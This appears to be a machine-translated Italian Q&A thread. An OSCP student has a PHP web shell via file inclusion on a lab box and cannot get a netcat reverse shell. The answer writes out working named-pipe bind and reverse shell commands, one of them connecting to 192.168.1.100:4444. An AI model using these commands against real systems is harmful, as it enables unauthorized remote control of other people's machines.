Impossibile ottenere un guscio inverso [chiuso]

Naviga le tue risposte
0

Sto facendo la mia certificazione OSCP. Su una delle macchine da laboratorio, sto attraversando un periodo difficile per ottenere un reverse shell.

Ho scansionato la macchina e ho trovato la porta 80 aperta. Ho enumerato ancora di più e ho trovato un RFI.
Ho caricato una shell Web PHP e ha funzionato, il comando è in esecuzione come utente apache. Poi ho enumerato di più e ho trovato netcat sulla macchina.

Ora voglio avere una shell nella mia casella di attacco. Ho provato ad usare netcat come shell inversa / binding e non ottenere nulla.

Ho provato diverse porte e non funziona nulla. Quando eseguo la scansione con porte nmap come 6666, 4444, 5555 vengono filtrate tutte.

Che cosa sto sbagliando?

    
posta Xozu 04.10.2016 - 10:45
fonte

1 risposta

10

La maggior parte dei nc nel laboratorio OffSec (come la maggior parte dei ncs nelle diffuse distribuzioni Linux) non supporta -e. Semplicemente non esiste.
La soluzione è di reindirizzare la comunicazione stdin / stdout attraverso una pipe: 

cd /tmp
mknod mypipe p
/bin/bash 0< /tmp/mypipe | nc -nlvp 4444 1> /tmp/mypipe

per una shell di binding o 

/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe

per un guscio inverso. Ecco un articolo completo su questo.

Recentemente ho trovato un altro nc su un sistema Ubuntu 10.04 dove il precedente listener di nc non avrebbe funzionato dal momento che nc non ha permesso -l e p simultaneamente. Quindi, prima di andare in panico perché la shell non funziona, dovresti prima cercare di ottenere l'aiuto di nc o provare a giocare con le varie opzioni (tendo a specificare un sacco di flag, forse uno dovrebbe mirare il meno possibile).

    
risposta data 04.10.2016 - 11:45
fonte

Leggi altre domande sui tag

Usare password fatte di parole Commutazione dei sistemi operativi per la sicurezza